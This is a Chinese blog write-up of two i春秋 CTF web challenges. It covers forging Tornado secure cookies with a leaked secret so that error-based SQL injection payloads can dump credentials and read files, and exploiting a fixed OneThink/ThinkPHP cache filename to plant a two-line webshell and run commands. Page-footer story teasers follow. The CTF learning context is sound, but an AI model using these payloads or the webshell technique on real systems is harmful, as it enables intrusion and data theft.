i春秋-WEB-xss平台&OneThink(Fiddler救我一命)

由于校赛马上就要开始了,自己最近也停止了钻研虚拟机跟渗透的过程,准备把ichunqiu上的web题再继续刷下去。于是遇到两道让我 收获颇丰的题目。

xss平台

这道题目算是很有意思的一道sql注入题。确切讲属于cookie加密注入。只不过要想发现漏洞并没有那么简单。

这里简单说一遍思路,首先当然是尝试登录了。只不过用户名与密码都一无所知。那么是不是有其他隐藏信息呢?扫描一遍目录没什么收获。暴力扫目录太耗时间。所以这里有一招利用报错获取信息的技巧。通过抓包将传参改为数组得到报错信息:


数组报错

发现这里的login.py部署在/rtiny/下,感觉有蹊跷。于是谷歌rtiny。
在github上找到这个项目并说明是一个xss轮子。仔细看下源码不难发现我们所做的xss平台这个网站是基于python的tornado框架。进行源码审计(这里我偷懒了,看大佬们轻松发现sql注入漏洞。毕竟文件太多看不来hh)
贴下rtiny目录下其中lock.py的源码

#!/usr/bin/env python
# -*- coding:utf-8 -*-  

__author__ = 'r0ker'
import tornado.web
from function import md5
import db
from config import URL


class LockHandler(tornado.web.RequestHandler):
    def get(self):
        self.set_secure_cookie("lock",'1')
        self.render("lock.html")

    def post(self):
        username = self.get_secure_cookie("username") or ''
        passwd = md5(self.get_argument('password', ''))
        row = db.ct("manager", "*", "username='" + username + "' and password='" + passwd + "'")
        if row:
            self.set_secure_cookie("lock", "0")
            self.redirect("http://" + URL)
        else:
            self.redirect("http://" + URL + "/lock")

这里不难发现username参数会用get_secure_cookie()函数从cookie中获取username,之后会利用username参数与passwd参数去进行数据库操作。这里我去db.py确认了下ct操作的功能

def ct(table, column, where):
    return db.get("select "+column+" from "+table+" where "+where)

看来是可以注入了。但现在需要知道cookie的加密方法,这个加密密钥可以在index.py中找到。为:"cookie_secret": "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc="
接下来要做的,就是利用这个现有轮子复现web服务,让我们的注入语句能够经过加密。
脚本如下。

# coding:utf-8
import tornado.ioloop
import tornado.web


settings = {
   "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=",
}

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("Hello")
        #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ")
        #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ")
        #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ")
        #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),29,60))) -- ")
        #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#")
        self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),24,60)))#")
        self.write(self.get_secure_cookie("username"))

def make_app():
    return tornado.web.Application([
        (r"/index", MainHandler),
        ], **settings)

if __name__ == "__main__":
    app = make_app()
    app.listen(8089)
    tornado.ioloop.IOLoop.instance().start()

这样我们就可以在本地复现并加密了。这里sql注入选择报错注入或者普通的select都是可以的。(报错注入比较稳)本地打开localhost:8089/index后抓包把返回的cookie中username值copy下来。之后进入到/lock下提交(在cookie中加入username的值)


lock

之后可由抓包信息拿到库名表名列名等。
不过这里爆出来的信息不能完全显示(username+passwd+email长度过长了),所以注入语句中可以看到使用了mid()函数,需要调整参数分开读数据,最终利用load_file()读取flag也是如此。

OneThink

苦苦坚持才做出的一题。昨天最后拿到flag后就发誓一定要写wp记录下自己的做题经历(菜鸡狂喜)。这里来写下详细过程:
首先登陆进去发现是OneThink框架。百度下搜到了OneThink存在的漏洞。还发现这个框架也是拿Thinkphp二次开发的,存在一个著名漏洞,就是缓存文件存储名是一个固定的。2bb202459c30a1628513f40ab22fa01a.php
去请求/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php也发现确实存在。
关于漏洞的简单利用之传一个phpinfo();上去
https://bbs.ichunqiu.com/thread-4918-1-1.html
可以看见我们也可以利用这个缓存文件漏洞getshell.但是首先注意,我们为了拿shell,必须确保语句正确传入缓存,也就是说我们必须以正确的用户名登录。那用户名有哪里不好传吗?当然,如果看完看上面那篇漏洞利用,就会发现我们的用户名必须是%0a+语句+//的格式,也就是说先换行,执行语句并注释掉后面的一个大括号。这里我们如果直接在注册界面用用户名注册,上传时仍会将我们的%0a进行url编码,这样实际上执行语句就不正确了。
于是开始下手。看到其他大佬都是burpsuite intercept进行改包,我也开始准备bp拦包发包。。。结果失败了???我百思不得其解,我的bp明明可以拦到http的post请求,结果却不能在intercept下抓到这个网页的post包?(测试了下其他网站都行,真的让人绝望)试图用repeater功能改包却发现因为验证码的存在是没用的。
就在这时我想起了自己刚入门时使用的抓包神器Fiddler。当初在用它时学到过其breakpoint的功能:

Automatic Breakpoint

它可以在requests前或者response后进行暂停,也就是抓包了。只要有它一样可以上传。于是改用Fiddler抓包
第一步,传%0a$a=$GET_[a];//
改包

这里将被编码过的%0a直接删掉,改为Enter一个回车解决问题。然后正常发包,关掉breakpoint,确认注册成功。之后登陆这个账号,这里当然也要再度打开breakpoint,在登录时将%0a改为换行。确认正确登录即可。

第二步,传%0aecho `$a`;//
同样操作再来一遍。

改包

登录

确认登录成功后就可以利用shell了。在缓存文件利用参数a跟ls找到flag目录,之后cat即可
http://fa88cc1f11014c3485ba87c6ad3176483ba0157572714652.changame.ichunqiu.com/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php
flag

总结下吧,这两天这两道题其实都花了不少时间,但是做的格外快乐,也非常有收获。比如第一题让我了解到程序员所谓的轮子指的是什么,了解到python的tornado框架(原来就知道Django),而且即使自己不完全理解框架的知识也能加以利用。第二题把一句话木马变体成两句话getshell,而且魔鬼般的发包改包也让我体会到web手的辛酸。ichunqiu下发的容器第一个1小时用完了才开始改用fiddler,之后按套路传应该传成功了却没有拿到shell。报复性传了个phpinfo()才确认自己在改包这个环节没有出错。于是绝望中重新下发容器再传一遍就成功了?!所以坚持一定有成果,相信自己做下去,一定不会让你失望。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,552评论 5 474
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,666评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,519评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,180评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,205评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,344评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,781评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,449评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,635评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,467评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,515评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,217评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,775评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,851评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,084评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,637评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,204评论 2 341

推荐阅读更多精彩内容

  • 漏洞挖掘与利用 测试环境的搭建 引言 为什么要搭建本地测试环境?我想下面的东西能够回答你的疑惑。 第二百八十五条 ...
    作业没写完阅读 3,164评论 0 4
  • Web安全简史 在Web1.0时代,人们更多是关注服务器端动态脚本语言的安全问题,比如将一个可执行脚本(俗称Web...
    潘良虎阅读 3,918评论 3 72
  • 手工: 第一种 1.判断输入框是否存在注入 直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),如果直接...
    查无此人asdasd阅读 11,446评论 0 6
  • 作者:Gilberto Najera-Gutierrez译者:飞龙协议:CC BY-NC-SA 4.0 简介 我们...
    三月行者阅读 1,861评论 1 17
  • 我们人永远拥有选择的权利,只是很多时候我们不知道,常常被自己的惰性、痛苦、贪婪……占据,从而过的不是自己想要的生活...
    郑惠彭阅读 380评论 0 1